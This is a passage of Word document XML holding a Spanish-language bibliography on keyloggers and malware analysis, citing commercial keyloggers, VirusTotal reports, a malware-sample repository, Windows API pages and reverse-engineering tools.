                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>KeeLog, «Forensic Keylogger Keyboard,» [En línea]. Available: http://www.keelog.com/keylogger-keyboard/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[57] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Wikipedia, «Cifrado XOR,» [En línea]. Available: https://es.wikipedia.org/wiki/Cifrado_XOR.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[58] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>KeeLog, «KeeLog KeyGrabber Pico 16Mb,» [En línea]. Available: http://www.keelog.com/keygrabber-pico-usb-16mb-tiny-usb-hardware-keylogger-with-16mb-flash-drive/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[59] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Maltronics, «Maltronics WiFi KeyLogger PRO,» [En línea]. Available: https://maltronics.com/collections/wifi-keyloggers/products/wifi-keylogger-pro.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[60] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Descarga de Spyrix Free Keylogger,» [En línea]. Available: http://www.spyrix.com/es/download.php.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[61] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Heavenward Keylogger Free,» [En línea]. Available: https://www.hwsuite.com/free-keylogger/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[62] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Virus Total. Analisis sps.exe Spyrix Keylogger,» [En línea]. Available: https://www.virustotal.com/gui/file/3e4acfd12289fec6ceaa2ced2892ab46ef528f43114ab0eb63354642db0890a1/detection.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[63] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«ASPACK ASProtect 32,» [En línea]. Available: http://www.aspack.com/asprotect32.html.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[64] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Virus Total. Analisis de freekey.exe,» [En línea]. Available: https://www.virustotal.com/gui/file/38c64d425d5784c9d4953b0087c7a7ccdff7f378626810cc207b3cc55eafcf03/detection.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[65] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Anti-keylogger Ghostpress download,» [En línea]. Available: https://schiffer.tech/#ghostpress.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[66] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Virus Total. Analisis de Ghostpress,» [En línea]. Available: https://www.virustotal.com/gui/file/e863969ed7511485aafc634265806536aed24667a334a26eaf5e7d8660f0dbf2/detection.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[67] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«KL-Detector v1.3,» [En línea]. Available: http://dewasoft.com/privacy/kldetector.htm.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[68] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Fuente de descarga de muestra del binario del malware Turla Keylogger,» [En línea]. Available: https://github.com/mstfknn/malware-sample-library/tree/master/Turla.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[69] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Microsoft Windows Dev Center, «IsDebuggerPresent function,» [En línea]. Available: https://docs.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-isdebuggerpresent.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[70] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Virus Total,» [En línea]. Available: https://www.virustotal.com/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[71] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Virus Total, «Virus Total. TurlaKeylogger.bin detection,» [En línea]. Available: https://www.virustotal.com/gui/file/b7b5d28be983c774ef83a8960a68134732a79818c572e8800cea6428f27fb114/detection. [Último acceso: 13 Agosto 2019].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[72] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">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DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[73] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«INTEZER Analyze. Turla,» [En línea]. Available: https://analyze.intezer.com/#/analyses/690085a2-ed14-4673-b9ec-1afdc4139d55.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[74] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Microsoft, «Visual Studio,» [En línea]. Available: https://visualstudio.microsoft.com/es/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[75] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Ghidra,» [En línea]. Available: https://ghidra-sre.org/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[76] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Radare,» [En línea]. Available: https://www.radare.org/r/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[77] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Cutter - the QT Gui for r2,» [En línea]. Available: https://radare.org/cutter/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[78] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«Using Entropy Analysis to Find Encrypted and Packed Malware,» [En línea]. Available: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.120.9861&amp;rep=rep1&amp;type=pdf.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[79] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>«x64dbg An open-source x64/x32 debugger for windows.,» [En línea]. Available: https://x64dbg.com/#start.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[80] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>M. W. D. Center, «Documentación función GetProcAddress,» [En línea]. Available: https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddress. [Último acceso: 29 Agosto 2019].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[81] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Microsoft, «Handle. Sysinternals.,» [En línea]. Available: https://docs.microsoft.com/en-us/sysinternals/downloads/handle.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t xml:space="preserve">[82] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="4723" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
                      <w:pStyle w:val="Bibliografa"/>
                    </w:pPr>
                    <w:r>
                      <w:t>Microsoft, «Process Explorer. Sysinternals.,» [En línea]. Available: https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00DF019A" w:rsidTr="00DF019A">
                <w:trPr>
                  <w:divId w:val="1125270685"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="224" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="00DF019A" w:rsidRDefault="00DF019A">
                    <w:pPr>
